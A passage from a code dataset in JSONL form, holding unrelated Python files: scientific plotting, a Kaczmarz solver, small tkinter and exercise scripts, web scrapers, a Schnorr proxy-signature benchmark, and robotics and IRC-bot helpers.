TimeDelta(time_diff, format='sec')\n\n time_mid = time_mid.plot_date\n\n time_at_bin_start = time_at_bin_start.plot_date\n\n time_at_bin_end = time_at_bin_end.plot_date\n\n time_diff_at_bin_start = time_mid - time_at_bin_start\n\n time_diff_at_bin_end = time_at_bin_end - time_mid\n\n # Where a lower bound was recorded.\n idx1 = np.where(np.invert(np.isnan(flux_history_lower_bound)))\n\n # Where a lower bound was not recorded.\n idx2 = np.where(np.isnan(flux_history_lower_bound))\n\n # Where no lower bound was recorded, set to zero flux.\n flux_history_lower_bound[idx2] = flux_history[idx2]\n\n # Plot data points and upper limits.\n ax.errorbar(time_mid[idx1], flux_history[idx1],\n yerr=(flux_history_lower_bound[idx1], flux_history_upper_bound[idx1]),\n xerr=(time_diff_at_bin_start[idx1], time_diff_at_bin_end[idx1]),\n marker='o', elinewidth=1, linewidth=0, color='black')\n ax.errorbar(time_mid[idx2], flux_history[idx2],\n yerr=(flux_history_lower_bound[idx2], flux_history_upper_bound[idx2]),\n marker=None, elinewidth=1, linewidth=0, color='black')\n ax.scatter(time_mid[idx2], (flux_history[idx2] + flux_history_upper_bound[idx2]),\n marker='v', color='black')\n ax.set_xlabel('Date')\n ax.set_ylabel('Flux (ph/cm^2/s)')\n ax.set_ylim(ymin=0)\n ax.xaxis_date()\n ax.xaxis.set_major_formatter(mdates.DateFormatter('%m/%Y'))\n ax.xaxis.set_major_locator(mdates.MonthLocator(interval=6))\n ax.figure.autofmt_xdate()\n\n return ax\n","sub_path":"gammapy/time/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":5195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"279809267","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom matrix_generation.band_mat_with_cond_num import band_mat_with_cond_num\nfrom tqdm import tqdm \nfrom collections import deque\n\n\ndef lyusternick_kaczmarz(A,b): \n n = len(A)\n A = A.astype(float)\n b = b.astype(float)\n \n # Norm each equation\n normCoef = np.sqrt(np.sum(A ** 2, 1)).T\n A /= normCoef[:, None]\n b /= normCoef\n x = np.random.rand(n)\n\n # using 2nd norm below (change to suit your needs)\n disparity = lambda x: np.linalg.norm(b - np.dot(A, np.transpose(x)))/np.linalg.norm(b)\n cosVectAngle = lambda a, b: np.inner(a, b) / np.linalg.norm(a) / np.linalg.norm(b)\n resudial = lambda x: np.linalg.norm(A @ x - b) / np.linalg.norm(b)\n\n HPlane_Pnts = deque()\n lastVr = None\n q_last = None\n init_lastVr = False\n\n res = [disparity(x)]\n for _ in tqdm(range(200000)):\n\n if disparity(x) < 10**(-5):\n break\n\n for i in range(n):\n t = A[i] @ x - b[i]\n x -= A[i] * t\n res.append(resudial(x))\n\n if i == n - 1:\n HPlane_Pnts.append(np.copy(x))\n \n if len(HPlane_Pnts) > 3:\n HPlane_Pnts.popleft()\n\n prevVr = HPlane_Pnts[-2] - HPlane_Pnts[-3] if not init_lastVr else lastVr\n lastVr = HPlane_Pnts[-1] - HPlane_Pnts[-2]\n\n init_lastVr = True\n q_prev = q_last\n q_last = np.linalg.norm(lastVr) / np.linalg.norm(prevVr)\n\n if q_prev is not None and q_last != 1 and \\\n np.isclose(q_prev, q_last) and np.isclose(cosVectAngle(prevVr, lastVr), 1):\n # Lyusternik acceleration\n x = HPlane_Pnts[-1] + (HPlane_Pnts[-1] - HPlane_Pnts[-2]) / (1.0 - q_last)\n HPlane_Pnts.clear() \n\n res.append(resudial(x))\n return x, res\n\n\nif __name__ == \"__main__\":\n row, col = 6, 6\n half_band_size, ampl, cond = 3, 50, 50\n matrix = band_mat_with_cond_num(row, col, half_band_size, ampl, cond)\n \n true_sol = np.random.randn(row)\n b = matrix @ true_sol\n \n x_kacz, res_kacz = lyusternick_kaczmarz(matrix, b)\n print(x_kacz)\n print(np.allclose(x_kacz, true_sol, 10**(-2)))\n\n # plt.figure(figsize=(14,8))\n # plt.semilogy(res_kacz, label='Lyusternick Kaczmarz')\n # plt.title('Relative residuals', fontsize = 20)\n # plt.ylabel('Value', fontsize = 12)\n # plt.xlabel('Projection number', fontsize = 12)\n # plt.yscale('log')\n # plt.legend()\n # plt.show()","sub_path":"slove_linear_system/kaczmarz/lyusternick_kaczmarz.py","file_name":"lyusternick_kaczmarz.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"85475090","text":"import tkinter as tk\nfrom tkinter import *\nalphabet = [[[[\"a\",\"b\",\"c\"],[\"d\",\"e\",\"f\"]],[[\"g\",\"h\",\"i\"],[\"j\",\"k\",\"l\"]]],[[[\"m\",\"n\",\"o\"],[\"p\",\"q\",\"r\"]],[[\"s\",\"t\",\"u\"],[\"v\",\"w\",\"x\",\"y\",\"z\"]]]]\ngui = Tk()\n\ndef readme(s):\n\tinitial = s.split(\":\")\n\tprint(initial)\n\tv = []\n\tfor i in range(0,len(initial)):\n\t\tv.append(initial[i].split(\",\"))\n\tstarter = \"\";\n\tfor j in range(0, len(v)):\n\t\ttry:\n\t\t\tstarter = starter + alphabet[int(v[j][0])][int(v[j][1])][int(v[j][2])][int(v[j][3])]\n\t\texcept ValueError:\n\t\t\t\tbreak\n\treturn starter\n\ndef makeme(s):\n\tb = s.split(\" \")\n\tif len(b) < 1:\n\t\treturn \"You Should not waste power with such small words comrade!\"\n\tif len(s) is 26 or len(s) is 52:\n\t\treturn \"Nice Try Comrade!\"\n\ta = list(s.replace(\" \",\"\").lower())\n\td = \"\"\n\tfor i in range(0,len(a)):\n\t\tfor q in range(0,len(alphabet)): ## first value for code\n\t\t\tfor w in range(0,len(alphabet[q])):\n\t\t\t\tfor e in range(0,len(alphabet[q][w])):\n\t\t\t\t\tfor r in range(0,len(alphabet[q][w][e])):\n\t\t\t\t\t\tif a[i] is alphabet[q][w][e][r]:\n\t\t\t\t\t\t\td = d + str(q)+\",\"+str(w)+\",\"+str(e)+\",\"+str(r)+\":\"\n\treturn d\n\ndef printresult(s,txbox):\n\ttxbox.delete(\"1.0\",\"end-1c\")\n\ttxbox.insert(\"end-1c\",makeme(s))\n\treturn \"break\" \ndef main():\n\tgui.title(\"Super Secret Encoder!\") \n\tmain = Frame(gui, background=\"#ff0000\")\n\tmain.pack(fill=X)\n\tswidth = gui.winfo_screenwidth()\n\tsheight = gui.winfo_screenheight()\n\twindowsize = str((int(swidth*0.2))) + \"x\" + str((int(sheight*0.15))) \n\tgui.geometry(windowsize)\n\tLabel(main, text=\"Use this to encode our messages Comrade!\", bg=\"#ff0000\", fg=\"white\").grid(row=0,column=0)\n\tsubframe = Frame(main, background = \"#ff0000\")\n\tsubframe.grid(row=1,column=0)\n\tLabel(subframe, text=\"text to Encrypt: \", bg=\"#ff0000\", fg=\"white\").grid(row=0,column=0)\n\ttbox = Text(subframe, height = 1, width=30)\n\ttbox.bind('', lambda event: printresult(tbox.get(\"1.0\",\"end-1c\"),txbox))\n\ttbox.grid(row=0,column=1, padx=(10,10))\n\ttxbox = Text(main, height = 4, width = 50) \n\ten = Button(main, text=\"Encrypt\", command=lambda: printresult(tbox.get(\"1.0\", \"end-1c\"),txbox)).grid(row=2, column=0)\n\ttxbox.grid(row=3,column=0)\n\tgui.mainloop()\nmain()\n","sub_path":"Encrypter.py","file_name":"Encrypter.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"213640863","text":"# Your code here\nimport codecs\nprint(codecs.encode(\n \"Items: .vgrzf() zrgubq ba n qvpgvbanel zvtug or hfrshy. vg'f cbffvoyr sbe .fbeg() gb fbeg ba zhygvcyr xrlf ng bapr. artngvirf zvtug uryc jurer erirefr jba'g. lbh pna cevag n inevnoyr svryq jvqgu va na s-fgevat jvgu arfgrq oenprf, yvxr fb\", \"rot13\"))\n\n# start here\nwith open(\"robin.txt\") as f:\n words = f.read()\n\n# words = \"Round the rugged rock the freak freak freak insanity! Don't forget to ruN to the stoRE, you freak!\"\n\n\ndef word_count(s):\n new_list = s.lower().split()\n # forbidden characters\n forbidden = '\":;,.-+=/\\|[]}{()?!*^&'\n storage = {}\n for word in new_list:\n word = word.lower()\n for letter in word:\n if letter in forbidden:\n word = word.replace(letter, \"\")\n if word == \"\":\n return {}\n if word in storage:\n storage[word] = storage[word] + \"#\"\n if word not in storage:\n storage[word] = \"#\"\n\n for key, value in sorted(storage.items(), key=lambda x: -len(x[1])):\n print(f'{key: <16}{value}')\n\n\nword_count(words)\n","sub_path":"applications/histo/histo.py","file_name":"histo.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"588799685","text":"# the goal of this program is to find the magicNumber.\n\nmagicNumber = 27\n\n# To print differnt data types on the same line NOTE: remove # on second line to run code.\n# print(\"AK\",47)\n\n''' This is a multiline comment\nfor n in range(101):\n if n is magicNumber:\n print()\n'''\n# To print the same data types on the same line\n# print(\"Hello my name is \" + \"Khalil\")\nfor n in range(101):\n if n is magicNumber:\n print(n, \"Is the magic number!\")\n break\n else:\n print(n)\n","sub_path":"comments.py","file_name":"comments.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"204350708","text":"import os\nfrom selenium.webdriver.support import expected_conditions as EC\n\nfrom selenium import webdriver\nimport urllib.request\nimport time\n\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\n\ndriver = webdriver.Chrome('D:/chromedriver')\nurl = 'http://mdcar.kr/search/list.mdc?ct=-2&b=%EC%A0%9C%EC%A1%B0%EC%82%AC&mg=%EB%AA%A8%EB%8D%B8&m=%EC%83%81%EC%84%B8%2B%EB%AA%A8%EB%8D%B8&cg=%EB%93%B1%EA%B8%89&c=&tt=&ft=&yb=&ye=&area=&cp=&cp2=&ac=&ip=&id=&fx=&ck=&lp=&pb=&pe=&mb=&me=&o1=&o2=&o3=&o4=&o5=&or=4&pg={}'\n\n# wait until someid is clickable\nwait = WebDriverWait(driver, 10)\n\npic_num = 0\n\nfor pg in range(9,16): # 페이지 순서대로 들어가기\n driver.get(url.format(pg+1))\n print(\"page\" , pg+1)\n driver.implicitly_wait(30) #로딩 대기\n # wait.until(EC.element_to_be_clickable((By.CLASS_NAME, 'price')))\n time.sleep(1.5)\n\n for pic in range(2, 17) : # 자동차 목록 순서대로 들어가기\n print(\"pic\" , pic)\n # page_list_list > li:nth-child(2) > div > div > a\n # page_list_list > li:nth-child(3) > div > div > a\n driver.find_element_by_css_selector('#page_list_list > li:nth-child({}) > div > div > a > div.price'.format(pic)).click()\n time.sleep(2.5)\n # wait.until(EC.element_to_be_clickable((By.ID, 'img'))) # img 뜨기전에 안넘어가도록\n for i in range(3): # 슬라이드에서 1~4번째 사진 빼오기\n images = driver.find_elements_by_css_selector(\"#img\")\n\n for img in images:\n driver.find_element_by_css_selector('#photoNxt').click()\n imgURL = img.get_attribute('src')\n print(imgURL)\n\n pic_num += 1\n\n if not os.path.exists('D:/moldeonCar'):\n os.makedirs('D:/moldeonCar')\n\n urllib.request.urlretrieve(imgURL, 'D:/moldeonCar/'+ str(318+pic_num) + \".jpg\")\n driver.back()\n time.sleep(1.5)\n # wait.until(EC.element_to_be_clickable((By.CLASS_NAME, 'price')))\n\ndriver.close()\n","sub_path":"Crowling/moelderncarCrawling.py","file_name":"moelderncarCrawling.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"380396323","text":"##\n## Programación en Python\n## ===========================================================================\n##\n## Para el archivo `data.csv, imprima una tabla en formato CSV que contenga\n## la cantidad de registros en que aparece cada clave de la columna 5.\n##\n## Rta/\n## aaa,13\n## bbb,16\n## ccc,23\n## ddd,23\n## eee,15\n## fff,20\n## ggg,13\n## hhh,16\n## iii,18\n## jjj,18\n##\n## >>> Escriba su codigo a partir de este punto <<<\n##\nf = open('data.csv', 'r').readlines()\nf = [row.replace('\\n', '') for row in f]\nf = [row.split('\\t') for row in f]\nf = [row[4] for row in f]\nf = [row.split(',') for row in f]\nf = [row for rowx in f for row in rowx]\nf = [row.replace(\":\", ',') for row in f]\nf = sorted([row.split(',') for row in f], key=None, reverse=False)\n\nnew_dict={}\nfor i in f:\n if i[0] in new_dict:\n new_dict[i[0]] = new_dict[i[0]] + 1\n else:\n new_dict[i[0]] = 1\nlista = [[key, value] for key, value in new_dict.items()]\n[[print(i[0]+','+str((i[1])))] for i in lista]\n","sub_path":"03-python=1/q09=1/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"143581574","text":"import requests\nfrom bs4 import BeautifulSoup\n\n# function for make number to 2 cipher digit. output type is string\ndef twoDigit(numb):\n if numb < 10:\n numb = str(numb)\n numb = \"0\" + numb\n return str(numb)\n else:\n return str(numb)\n\n# function for shortn the 'link.get('href')'\ndef links():\n return link.get('href')\n\nymin = 1989\nymax = 2016\nmmin = 1\nmmax = 12\n\n# make file 'total_links.txt'\nPATH = \"total_links\" + \".html\"\n\nfor y in range(ymin, ymax + 1):\n f = open(PATH, \"a\", encoding=\"utf-8\")\n print(\"Start Crawling the archive \" + str(y))\n for m in range(mmin, mmax + 1):\n m = twoDigit(m)\n url = 'https://neolook.com/archives/' + str(y) + str(m)\n source_code = requests.get(url)\n plain_text = source_code.text\n soup = BeautifulSoup(plain_text, \"html.parser\")\n\n for link in soup.find_all('a'):\n if 20 > len(links()) >= 19:\n print(links())\n f.write('https://neolook.com' + str(links()) + '\\n')\n m = int(m)\n m = m + 1\n print(\"Crawling Done\")\nf.close\n","sub_path":"toolbox/btNLK_monthLinkCrawler.py","file_name":"btNLK_monthLinkCrawler.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"98094838","text":"##################\n# # # Import # # #\n##################\nfrom charm.toolbox.integergroup import IntegerGroupQ\nfrom charm.core.engine.protocol import *\nimport time\nimport sys\n\n######################\n# # # Parameters # # #\n######################\nPRIME_SIZE = 1024\nmsg_file_path = \"./res/message.txt\"\nwarrant_file_path = \"./res/client.crt\"\ndebug = False\n\n\n#########################\n# # # General Setup # # # \n#######################i##\ndef setup():\n\n # Generate a cryptographic \"group\" for Zq* based signature (see schnorr signature scheme)\n group = IntegerGroupQ(0)\n\n # Generate p and q with a sufficiently large prime size\n group.paramgen(PRIME_SIZE)\n\n # Generate keys (private: u, public: e) and generator \n p = group.p\n u, g = group.random(), group.randomGen() # u is in Zq, g is in G\n e = (g**u) % p # e is in G, (aka p)\n priv = {'g': g, 'u': u}\n pub = {'g': g, 'e': e}\n \n # read in message warrant\n m_w = open(warrant_file_path, 'r').read()\n\n # read in message to send\n m_p = open(msg_file_path, 'r').read()\n\n return {'group': group, 'public': pub,'private': priv,'warrant': m_w, 'message': m_p}\n\n####################################\n# # # Proxy Unprotected Scheme # # #\n####################################\n\ndef generate(m_w, priv, group):\n \n #unpack variables\n p = group.p\n q = group.q\n u = priv['u']\n g = priv['g']\n\n # start timer\n start = time.perf_counter()\n\n # select a random integer in Zq, call it i. This behaves somewhat like a private key.\n i = group.random()\n\n # create a variable t_one, set it equal to i's \"public key\"\n t_one = (g**i) % p\n\n # create a hash of the message warrant and t_one, this acts as a nonce\n j = group.hash(m_w, t_one)\n\n # combine j and the original private key (u) with i, this is now your proxy private key\n b = (j*u + i) % q\n\n # stop timer\n gen_time = time.perf_counter() - start\n\n # package up all necessary information\n gener_msg = (m_w, b, t_one, i)\n\n # end of generate()\n return gener_msg, str(gen_time)\n\n\ndef sign_schnorr(msg, priv, group):\n k = group.random() # randomly chosen in Zq\n r = (priv['g'] ** k) % group.p # evaluated in G, (aka p)\n e = group.hash(msg, r) # evaluated in Zq\n s = (k - priv['u'] * e) % group.q # evaluated in Zq\n return {'s':s, 'e':e}\n\n\ndef sign(gener_msg, msg, priv, pub, group):\n\n # unpack message\n m_w = gener_msg[0]\n b = gener_msg[1]\n t_one = gener_msg[2]\n i = gener_msg[3]\n p = group.p\n q = group.q\n u = priv['u']\n g = priv['g']\n e = pub['e']\n\n # start timer\n start = time.perf_counter()\n\n # create a hash of the message warrant and t_one, this acts as a nonce\n j = group.hash(m_w, t_one)\n\n # combine j and the original private key (u) with i, this is now your proxy private key\n #b = (j*u + i) % q\n\n # raise g^b for verification\n #g_b = (g**b) % p\n\n # create the check to confirm validity of b and {m_w, t_one} congruence\n #g_b_sign = ( (e**j) * t_one ) % p\n\n # Verify that g_b and g_b_sign equate\n \n #if debug:\n # if (g_b != g_b_sign):\n # print(\"[Error] g_b and g_b_sign are not equivalent.\")\n # else: \n # print(\"[Success] g^b and e^j * t_one are equivalent.\")\n\n # sign\n sig = sign_schnorr(msg, {'g': g, 'u':b}, group)\n\n # stop timer\n sign_time = time.perf_counter() - start\n\n # pass a tuple containing (m_p, s, t_one, m_w) to the verifier\n sign_msg = (msg, sig, t_one, m_w)\n\n return sign_msg, str(sign_time) \n\n\ndef verif_schnorr(msg, sig, pub, group):\n r = ((pub['g'] ** sig['s']) * (pub['e'] ** sig['e'])) % group.p # evaluated in G, (aka p)\n e = group.hash(msg, r) # evaluated in Zq\n if e == sig['e']:\n return True\n else:\n return False\n return None\n\n\ndef verify(sign_msg, pub, group):\n\n # unpack message\n m_w = sign_msg[3]\n t_one = sign_msg[2]\n sig = sign_msg[1]\n msg = sign_msg[0]\n e = pub['e']\n g = pub['g']\n p = group.p\n q = group.q\n\n # start timer\n start = time.perf_counter()\n\n # create a hash of the message warrant and t_one, this acts as a nonce\n j = group.hash(m_w, t_one)\n\n # raise e to the power of j and multiply by t_one to create the public key\n e_prime = ( (e**j) * t_one ) % p\n\n # verify\n res = verif_schnorr(msg, sig, {'g': g, 'e': e_prime}, group)\n\n # stop timer\n verif_timer = time.perf_counter() - start\n\n if debug:\n if res:\n print(\"Success\")\n else:\n print(\"Failure\")\n\n return str(verif_timer)\n\n\n\ndef schnorr_wrapper(vals):\n start1 = time.perf_counter()\n sig = sign_schnorr(vals['message'], vals['private'], vals['group'])\n schnorr_sign_time = time.perf_counter() - start1\n start2 = time.perf_counter()\n verif_schnorr(vals['message'], sig, vals['public'], vals['group'])\n schnorr_verif_time = time.perf_counter() - start2\n return str(schnorr_sign_time), str(schnorr_verif_time)\n\ndef master():\n vals = setup() \n gen_msg, gen_time = generate(vals['warrant'],vals['private'],vals['group'])\n sign_msg, sign_time = sign(gen_msg, vals['message'], vals['private'], vals['public'], vals['group'])\n verif_time = verify(sign_msg, vals['public'], vals['group'])\n schnorr_sign_time, schnorr_verif_time = schnorr_wrapper(vals)\n\n if debug:\n print('gen_time')\n print(gen_time)\n print('')\n print('sign_time')\n print(sign_time)\n print('')\n print('verif_time')\n print(verif_time)\n print('')\n print('schnorr_sign_time')\n print(schnorr_sign_time)\n print('')\n print('schnorr_verify_time')\n print(schnorr_verif_time)\n print('')\n\n with open(\"proxy-signature-timings.csv\" , \"a\") as f:\n f.write((\", \".join([gen_time, sign_time, verif_time, schnorr_sign_time, schnorr_verif_time]))+\"\\n\")\n\n\n\nmaster()\n","sub_path":"proxsig.py","file_name":"proxsig.py","file_ext":"py","file_size_in_byte":6071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"588172084","text":"def get_user_info(update):\n \"\"\"Return user information who interacts with bot.\"\"\"\n return 'Request from user_id: {0}, username: {1},' \\\n 'first_name: {2}, last_name: {3}'.format(\n update.message.chat.id,\n update.message.chat.username,\n update.message.chat.first_name,\n update.message.chat.last_name)\n\n\ndef print_access_error(update):\n \"\"\"Send authorization error to telegram chat.\"\"\"\n update.message.reply_text('Not authorized')\n\n\ndef build_commands_presentation(bot, cam_id):\n groups = []\n for desc, cmds in bot.cam_registry.get_commands(cam_id).items():\n groups.append(\n '{0}\\n{1}'.format(desc, '\\n'.join(['/' + c for c in cmds])))\n return '\\n\\n'.join(groups)\n","sub_path":"hikcamerabot/callbacks/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"353398716","text":"def check(n, h, idx, start, res):\n if idx == h:\n print(''.join(res))\n return\n for i in range(n - h + idx, start - 1, -1):\n res[i] = '1'\n check(n, h, idx + 1, i + 1, res)\n res[i] = '0'\ndef solve():\n input()\n n, h = map(int, input().split())\n res = ['0'] * n\n check(n, h, 0, 0, res)\n\nt = int(input())\nfor tc in range(t):\n solve()\n if tc < t - 1:\n print()","sub_path":"Backtracking/The Hamming Distance Problem.py","file_name":"The Hamming Distance Problem.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"137975149","text":"#!/usr/bin/env python\nimport rospy\nimport random\nfrom numpy.random import normal\nfrom math import sqrt\nfrom sensor_msgs.msg import BatteryState\n\ndef bms():\n\trospy.init_node('BMS')\n\trate = rospy.Rate(10)\n\tstart = rospy.Time.now()\n\tmAh_cap = 3000 #battery charge max capacity\n\tvariance = 50 #mAh variance in battery reading\n\tpub = rospy.Publisher('battery', BatteryState, queue_size=10)\n\twhile not rospy.is_shutdown():\n\t\tdiff = rospy.Time.now() - start\n\t\tfifteen = rospy.Duration.from_sec(900)\n\t\tcharge_remaining = mAh_cap*(1-diff/fifteen)\n\t\treading = normal(charge_remaining, sqrt(variance))\n\t\tmessage = BatteryState()\n\t\tmessage.charge = reading\n\t\tmessage.voltage = reading\n\t\tpub.publish(message)\n\t\trate.sleep()\n\nif __name__ == '__main__':\n\tbms()\n","sub_path":"scripts/simulated_sensors/bms.py","file_name":"bms.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"254839018","text":"import math\nfrom tj2_tools.robot_state import Simple3DState\nfrom fitting_trajectory import predict\n\ndef get_next_state(t0, x0, v0, a, t_step):\n t1 = t0 + t_step\n dt = t1 - t0\n\n x1 = x0 + v0 * dt + 0.5 * a * dt * dt\n v1 = v0 + a * dt\n return t1, x1, v1\n\n\ndef one_bounce(t0, x0, v0, a, t_limit, t_step):\n while x0 >= 0.0 and t0 < t_limit:\n t0, x0, v0 = get_next_state(t0, x0, v0, a, t_step)\n\n if x0 < 0.0:\n x0 = 0.0\n\n return t0, x0, v0\n\n\ndef get_bounces(x0, v0, rho, tau, g, t_limit, t_step):\n \"\"\"\n :param x0: initial height\n :param v0: initial velocity\n :param rho: coefficient of restitution (how much velocity is retained after a bounce)\n :param tau: contact time (how long velocity is 0.0 during a bounce)\n :param g: acceleration due to gravity (must be < 0.0)\n :param t_limit: time above which the simulation is considered done\n :param t_step: time resolution of simulation\n :return: t data, x data\n \"\"\"\n assert g < 0.0\n t1 = 0.0\n x1 = x0\n first = True\n while first or t1 < t_limit:\n t1, x1, v0 = one_bounce(t1 + (0.0 if first else tau), x1, v0, g, t_limit, t_step)\n v0 *= -rho\n if first:\n first = False\n return x1, v0\n\n\ndef roll_object(x0, v0, a, t_limit, t_step):\n t0 = 0.0\n\n while t0 < t_limit and v0 > 0.0:\n t0, x0, v0 = get_next_state(t0, x0, v0, a, t_step)\n\n return x0, v0\n\n\ndef get_time_to_distance(x1, v0, a, vmax, t_limit, t_step, data=None):\n \"\"\"\n :param x1: distance to goal (assume starting from 0.0)\n :param v0: initial velocity\n :param a: acceleration of system\n :param vmax: maximum velocity of the system\n :param t_limit: time above which the simulation is considered done\n :param t_step: time resolution of simulation\n :return: t arrival\n \"\"\"\n t0 = 0.0\n x0 = 0.0\n a = math.copysign(a, x1)\n\n while t0 < t_limit:\n t0, x0, v0 = get_next_state(t0, x0, v0, a, t_step)\n v0 = min(vmax, max(-vmax, v0)) # clip velocity to -vmax...+vmax\n if data is not None:\n data.append([t0, x0, v0])\n if x1 < 0.0:\n if x0 < x1:\n return t0\n else:\n if x0 > x1:\n return t0\n\n return t0\n\nclass BouncePredictor:\n def __init__(self, rho, tau, g, a_friction, t_step, ground_plane, a_robot, v_max_robot, t_limit):\n self.rho = rho\n self.tau = tau\n self.g = g\n self.a_friction = a_friction\n self.t_step = t_step\n self.ground_plane = ground_plane\n self.a_robot = a_robot\n self.v_max_robot = v_max_robot\n self.t_limit = t_limit\n\n def get_prediction(self, state: Simple3DState, t_window):\n x0 = state.x\n vx0 = state.vx\n x1, vx1 = roll_object(x0, vx0, self.a_friction, t_window, self.t_step)\n\n y0 = state.y\n vy0 = state.vy\n y1, vy1 = roll_object(y0, vy0, self.a_friction, t_window, self.t_step)\n\n z0 = state.z - self.ground_plane\n vz0 = state.vz\n z1, vz1 = get_bounces(z0, vz0, self.rho, self.tau, self.g, t_window, self.t_step)\n z1 += self.ground_plane\n\n future_state = Simple3DState(x1, y1, z1, state.theta, vx1, vy1, vz1, state.vt)\n future_state.stamp = state.stamp + t_window\n return future_state\n\n def get_robot_intersection(self, odom_msgs, detection_msgs):\n msgs = odom_msgs + detection_msgs\n rv = self.v_max_robot # robot velocity\n vx, vy, cx, cy = predict(msgs)\n dist = math.sqrt(cx*cx+cy*cy)\n time = dist / rv\n nx, ny = cx+vx*time, cy+vy*time # newx, newy\n rad = math.atan2(ny, nx)\n\n state.x = nx\n state.y = ny\n state.z = 0\n state.theta = rad\n state.stamp = time # time from the last detection time.\n\n return state #self.get_prediction(obj_state, t_window)\n","sub_path":"playground/bounce_trajectories/predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"412790336","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 9.9.2012\n\n@author: huqa // Ville Riikonen \n@copyright Copyright (c) 2012,2014 Ville Riikonen\n@license BSD\n\"\"\"\n\nimport datetime\nimport time\nfrom math import ceil, sqrt\nimport namedays as nday\nfrom operator import itemgetter\n\n\nclass Pvm(object):\n\n def __init__(self, bot):\n self.bot = bot\n self.channels = []\n \n # remind every day at midnight\n def midnight_shout(self):\n #self.bot.scheduler.add_cron_job(self.shout_pvm_stats, second='0', month='*', day='*', hour='0', minute='0', day_of_week='*')\n self.bot.scheduler.add_job(self.shout_pvm_stats, 'cron', month='*', day='*', day_of_week='*', hour='0', minute='0', second='0')\n\n def shout_pvm_stats(self):\n \"\"\"Internal command for shouting word stats and day info at midnight\"\"\"\n if not self.bot:\n return\n\n if not self.channels:\n self.channels = self.bot.get_channels_for_stats()\n ds = time.localtime()\n weekn = datetime.date(ds.tm_year, ds.tm_mon, ds.tm_mday).isocalendar()[1]\n outstr = \"Tänään on \" + nday.wday_str(ds.tm_wday) + \" \" + str(ds.tm_mday) + \".\" \\\n + str(ds.tm_mon) + \".\" + str(ds.tm_year) + \" (viikko \" + str(weekn) +\") vuoden \" + str(ds.tm_yday) + \". päivä. Nimipäivää viettää \" + nday.get_nameday(ds.tm_mon,ds.tm_mday)\n toptod = self.bot.get_words()\n words_str = \"\"\n for ch in self.channels:\n time.sleep(10)\n if ch in toptod: \n stats = toptod[ch]\n sorted_stats = sorted(stats.iteritems(), key=itemgetter(1))[0:10]\n sorted_stats.reverse()\n sija = 1\n all = 0\n mean = 0\n words_str = \"\"\n med_sija = int(ceil(len(sorted_stats) / 2.0))\n median = 0\n for x in sorted_stats:\n if sija is med_sija:\n median = x[1]\n words_str += \" %d. %s:(%d)\" % (sija, str(x[0]), x[1])\n sija += 1\n all += x[1]\n mean = all / (sija - 1)\n var_summa = 0\n for x in sorted_stats:\n var_summa += ((x[1] - mean)**2)\n keskihajonta = sqrt((var_summa/float((sija - 1))))\n self.bot.say(ch, words_str.strip())\n self.bot.say(ch, \"Top 10 yhteensä: %d Keskiarvo: %d Mediaani: %d Keskihajonta: %d\" % (all, mean, median, keskihajonta))\n self.top_all(ch, stats)\n self.bot.say(ch, outstr)\n \n self.bot.clear_words()\n\n def top_all(self, channel, stats):\n sorted_stats = sorted(stats.iteritems(), key=itemgetter(1))\n sorted_stats.reverse()\n sija = 1\n all = 0\n med_sija = int(ceil(len(sorted_stats) / 2.0))\n median = 0\n for x in sorted_stats:\n if sija is med_sija:\n median = x[1]\n sija += 1\n all += x[1]\n mean = all / (sija - 1)\n var_summa = 0\n for x in sorted_stats:\n var_summa += ((x[1] - mean)**2)\n keskihajonta = sqrt((var_summa/float((sija - 1))))\n self.bot.say(channel, \"Kaikki yhteensä: %d Keskiarvo: %d Mediaani: %d Keskihajonta: %d\" % (all, mean, median, keskihajonta)) \n\n def shout_pvm_stats_to_chan(self, chan):\n if not self.bot:\n return\n \n if not chan:\n return\n \n ds = time.localtime()\n weekn = datetime.date(ds.tm_year, ds.tm_mon, ds.tm_mday).isocalendar()[1]\n outstr = \"Tänään on \" + nday.wday_str(ds.tm_wday) + \" \" + str(ds.tm_mday) + \".\" \\\n + str(ds.tm_mon) + \".\" + str(ds.tm_year) + \" (viikko \" + str(weekn) +\") vuoden \" + str(ds.tm_yday) + \". päivä. Nimipäivää viettää \" + nday.get_nameday(ds.tm_mon,ds.tm_mday)\n\n self.bot.say(chan, outstr)\n","sub_path":"pyfibot/lib/pvm.py","file_name":"pvm.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"584860959","text":"NO_CONTEXT_WORD = 'OSOFo'\nPAD_WORD = ''\nSTART_WORD = 